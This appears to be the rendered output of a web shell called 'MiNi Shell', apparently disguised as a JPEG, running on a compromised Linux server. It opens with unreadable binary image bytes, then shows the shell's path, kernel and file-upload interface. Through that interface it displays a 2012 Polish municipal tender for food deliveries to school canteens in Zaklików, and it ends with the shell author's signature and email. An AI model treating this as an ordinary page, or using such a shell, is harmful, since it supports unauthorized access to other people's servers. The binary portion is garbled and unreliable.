JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120306/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120306/68972-N-2012.html

<p class="kh_header"><b>Zaklików: SUKCESYWNA DOSTAWA ARTYKUŁÓW ŻYWNOŚCIOWYCH DO STOŁÓWEK W SZKOŁACH I PRZEDSZKOLU Z TERENU GMINY ZAKLIKÓW W ROKU 2012</b><br>
<b>Numer ogłoszenia: 68972 - 2012; data zamieszczenia: 06.03.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Gminy , ul. Zachodnia 15, 37-470 Zaklików, woj. podkarpackie, tel. 015 8738476, faks 015 8738324.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://www.zaklikow.pl</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> nie dotyczy</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Gminny Zespół Ekonomiczno-Administracyjny Szkół w Zaklikowie.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> SUKCESYWNA DOSTAWA ARTYKUŁÓW ŻYWNOŚCIOWYCH DO STOŁÓWEK W SZKOŁACH I PRZEDSZKOLU Z TERENU GMINY ZAKLIKÓW W ROKU 2012.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.Przedmiot zamówienia obejmuje sukcesywną dostawę artykułów żywnościowych do stołówek w szkołach i przedszkolu z terenu Gminy Zaklików, w skład której wchodzą:
CZĘŚĆ PIERWSZA: Artykuły mleczarskie
LP Nazwa artykułu Ilość
1 Ser topiony 100szt
2 Ser biały 800kg
3 Ser żółty 200kg
4 Śmietana 18% 2400l
5 Jogurt pitny 7200szt
6 Margaryna Palma 8kg
7 Mleko 2% 4000l
8 Masło 1200kg
9 Margaryna do smarowania pieczywa 600kg
CZĘŚĆ DRUGA: Mięso i produkty mięsne, wędliny
LP Nazwa artykułu Ilość
1 Szynka surowa 50kg
2 Łopatka b/k 800kg
3 Kości schabowe 400kg
4 Żeberka 60kg
5 Mięso mielone 1600kg
6 Słonina 200kg
7 Smalec 200kg
8 Boczek 600kg
9 Wątroba wieprzowa 30kg
10 Parówki 200kg
11 Kiełbasa podwawelska 120kg
12 Kiełbasa zwyczajna 100kg
13 Kiełbasa domowa 100kg
14 Kiełbasa targowa 30kg
15 Kiełbasa wiejska 40kg
16 Kiełbasa drobiowa 60kg
17 Szynka gotowana 60kg
18 Kiełbasa lencz 20kg
19 Mortadela 10kg
20 Pierś drobiowa wędzona 10kg
21 Filet drobiowy 1400kg
22 Kurczak 1000kg
23 Udko 1700kg
24 Porcje rosołowe 800kg
CZĘŚĆ TRZECIA: Owoce i warzywa
LP Nazwa artykułu Ilość
1 Ziemniaki 25000kg
2 Jabłka świeże 2200kg
3 Kalafior świeży 200kg
4 Koper świeży 500szt
5 Marchew świeża 2000kg
6 Cebula 1000kg
7 Pietruszka korzeń 1000kg
8 Por 600kg
9 Buraki świeże 1500kg
10 Kapusta biała 1200kg
11 Kapusta pekińska 500szt
12 Kapusta włoska 200szt
13 Seler świeży 500kg
14 Sałata 300szt
15 Pomidory świeże 400kg
16 Papryka świeża 50kg
17 Ogórek świeży 300kg
18 Pieczarki świeże 1200kg
19 Pietruszka natka 700szt
20 Szczypior 500szt
21 Mandarynki 140kg
22 Pomarańcze 260kg
23 Kiwi 30kg
24 Cytryny 150kg
25 Gruszki świeże 200kg
26 Śliwki świeże 40kg
27 Brzoskwinie świeże 40kg
28 Malina świeża 120kg
29 Wiśnia świeża 40kg
30 Banany 600kg
31 Fasola 400kg
CZĘŚĆ CZWARTA: Różne produkty spożywcze
LP Nazwa artykułu Ilość
1 Miód 70szt
2 Mąka 1000kg
3 Mąka ziemniaczana 200kg
4 Cukier puder 100kg
5 Cukier 2000kg
6 Kasza gryczana 300kg
7 Kasza jęczmienna 200kg
8 Ryż 400kg
9 Przyprawy (KUCHAREK) 450kg
10 Sól 400kg
11 Olej 2300l
12 Koncentrat pomidorowy 400l
13 Majonez 200l
14 Ocet 40l
15 Ketchup 200l
16 Herbata 1000szt
17 Cukier waniliowy 600szt
18 Groszek konserwowy 200szt
19 Kukurydza konserwowa 100szt
20 Kakao 200szt
21 Kawa inka 100szt
22 Soki owocowe 700szt
23 Dżemy 400szt
24 Budyń 30szt
25 Kisiel 450szt
26 Galaretka 220szt
27 Drożdże 100szt
28 Pieprz czarny mielony 600szt
29 Pieprz ziołowy 600szt
30 Rosołki drobiowe 150szt
31 Papryka mielona słodka 30szt
32 Papryka mielona ostra 30szt
33 Ziele angielskie 110szt
34 Liść laurowy 100szt
35 Kwasek cytrynowy 100szt
36 Majeranek 100szt
37 Czosnek granulowany 50szt
38 Musztarda 30szt
39 Chrzan 100szt
40 Płatki śniadaniowe 250szt
41 Kapusta kwaszona 800kg
42 Ogórek kwaszony 800kg
43 Mleko w proszku 20szt
44 Makarony 2000kg
45 Sos boloński 140szt
46 Sos grzybowy 140szt
47 Sos pieczeniowy 200szt
48 Sos sałatkowy 250szt
49 Sos słodko-kwaśny Łowicz 40szt
50 Barszcz biały 700szt
51 Zupa grzybowa 30szt
52 Przyprawa Magii 55szt
53 Przyprawa do kurczaka 100szt
54 Przyprawa do ryb 60szt
55 Przyprawa Gyros 15szt
56 Bułka tarta 400kg
57 Nutella 100szt
58 Baton Lion 1720szt
59 Prince Polo 1800szt
60 Baton Kinder 50szt
61 Cukierki czekoladowe-galaretka 20kg
62 Ciastka Lubisie 500szt
63 Delicje 100szt
64 Ciasto drożdżowe 130szt
65 Ciastka Wikoma MIR 50szt
66 Ciastka Napol 30szt
67 Chrupki kukurydziane-pałki 50szt
68 Wafle tortowe 50szt
69 Ryba wędzona 20kg
70 Ryba mrożona 750kg
71 Pierogi ruskie (świeże) 1370kg
72 Mrożonki 1500szt
73 Frytki 250kg
74 Konserwa rybna 120szt
CZĘŚĆ PIĄTA: JAJA
LP Nazwa artykułu Ilość
1 Jajka 18000szt
CZĘŚĆ SZÓSTA: Pieczywo świeże i wyroby piekarskie
LP Nazwa artykułu Ilość
1 Chleb 2000szt
2 Bułki 4000szt
3 Chleb razowy 500szt
4 Pączki 2000szt
5 Drożdżówki 250szt
6 Rogal słodki 350szt 
2.Wykonawca dokona wyceny towaru podając górna granicę sprzedaży w okresie trwania umowy.
3.Cząstkowe faktury będą wystawiane wg stawek obowiązujących u Wykonawcy w danym okresie (nie dopuszcza się przekroczenia cen jednostkowych zawartych w ofercie wykonawcy). 
4.Przez dostawę Zamawiający rozumie cykliczne dostawy towaru na podstawie zamówienia dostosowanego do jego potrzeb, składanych pisemnie lub telefonicznie przez upoważnioną osobę Zamawiającego - osoba upoważniona do składania zamówień : 
a.Pani Anna Karbarz - Zespołu Szkół Ogólnokształcących w Zaklikowie, ul. Sandomierska56,
b.Pani Elżbieta Osińska - Publicznego Przedszkola w Zaklikowie ul. Krzywa 65,
c.Pani Stanisława Czajka - Zespołu Szkół w Zdziechowicach,
Pani Barbara Studzińska - Zespołu Szkół w Lipie, ul. Szkolna 5,
5.Z okresu dostawy wyłączone będą miesiące wakacyjne (lipiec - sierpień 2012)
6.Transport artykułów przez Wykonawcę winien być wykonywany środkami transportu oraz w pojemnikach spełniających wymagania sanitarne (w tym dotyczące czynności związane z załadunkiem i rozładunkiem). 
7.Wykonawca gwarantuje dobrą jakość dostarczanego towaru i oświadcza, że dostarczone artykuły są w pierwszym gatunku z cechami podanymi w SIWZ.
8.Produkty muszą spełniać normy jakościowe oraz muszą być dostarczone w ich początkowym okresie gwarancji.
9.W przypadku stwierdzenia przez Zamawiającego wadliwej partii dostarczonego towaru, reklamacja zostanie zgłoszona telefonicznie lub pisemnie. Wykonawca zobowiązuje się niezwłocznie do jego wymiany na towar wolny od wad, w ilościach zakwestionowanych przez Zamawiającego. 
10.Wykonawca zobowiązuje się dostarczyć towar do:
a.Zespołu Szkół Ogólnokształcących w Zaklikowie, ul. Sandomierska56,
b.Publicznego Przedszkola w Zaklikowie ul. Krzywa 65,
c.Zespołu Szkół w Zdziechowicach,
d.Zespołu Szkół w Lipie, ul. Szkolna 5,
własnym transportem, na własny koszt i własne ryzyko oraz do elastycznego reagowania na zwiększone lub zmniejszone potrzeby Zamawiającego w stosunku do danego asortymentu lub całości dostawy. 
11.Zamówienie musi być odpowiednio podzielone na wyżej wymienione placówki wg wskazówek Zamawiającego, w celu sprawniejszego transportu
12.Data dostawy oraz ilości będą podawane Wykonawcy każdorazowo w formie zamówienia pisemnego lub telefonicznego z co najmniej jednodniowym wyprzedzeniem
13.Dostawa będzie się odbywała codziennie.
14.W trakcie realizacji umowy Zamawiający może dokonywać przesunięć ilościowych asortymentu według bieżących potrzeb i celowości ich zakupu co nie skutkuje w stosunku do Wykonawcy roszczeń finansowych i prawnych. 
15.Nie wykonanie pełnego zakresu ilościowego umowy nie rodzi roszczenia o zakup nie zrealizowanej w okresie obowiązywania umowy ilości towaru.
16.Zamawiający dopuszcza możliwość składania ofert równoważnych, tj. ofert obejmujących artykuły odpowiadające właściwościom artykułów wyszczególnionych w formularzu cenowym, różniących się od nich nazwą i producentem.
17.Ze względu na często zmieniające się nazwy produktów zamawiający w trakcie trwania umowy dopuszcza możliwość dokonywania zakupów, artykułów równoważnych takich które nie zostały wymienione w formularzu ofertowym a odpowiadają właściwościom artykułów wyszczególnionych w formularzu takich które różnią się nazwą i producentem.
18.Termin płatności wynosi 30 dni licząc od dnia dostarczenia faktury..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 15.11.20.00-6, 15.10.00.00-9, 15.13.11.20-2, 15.20.00.00-0, 15.31.11.00-2, 03.14.25.00-3, 15.50.00.00-3, 03.21.21.00-1, 03.12.10.00-5, 15.30.00.00-1, 15.33.11.00-8, 15.80.00.00-6, 15.85.11.10-2, 15.85.10.00-8, 15.61.25.00-6, 15.84.22.20-0.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 6.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten będzie spełniony, jeżeli Wykonawcy udokumentują, że w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonali dostawy odpowiadające swoim rodzajem przedmiotowi zamówienia, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że dostawy zostały wykonane należycie, w szczególności Zamawiający wymaga, aby Wykonawca wykonał w tym okresie minimum jedną dostawę polegającą na dostarczeniu produktów żywnościowych</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Weryfikacja tego warunku dokonywana będzie w oparciu o wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, wraz z informacją o podstawie do dysponowania tymi osobami, obejmujący co najmniej: osobę której powierzone zostaną obowiązki reprezentowania Wykonawcy w zakresie świadczonych dostaw</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Inne dokumenty wymagane przez Zamawiającego
1 Formularz oferta 
2 Oświadczenie o spełnieniu warunków udziału w postępowaniu  
3 Projekt umowy 
stanowiące załączniki do SIWZ
W przypadku wspólnego ubiegania się wykonawców o udzielenie zamówienia należy wspólnie złożyć oświadczenie, o którym mowa w pkt. 2</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://www.zaklikow.biuletyn.net<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Gminny Zespół Ekonomiczno- Administracyjno Szkół i Przedszkoli
37-470 Zaklików ul. Zachodnia 15 pok. 20.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 20.03.2012 godzina 15:00, miejsce: Gminny Zespół Ekonomiczno- Administracyjno Szkół i Przedszkoli
37-470 Zaklików ul. Zachodnia 15 pok. 20.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com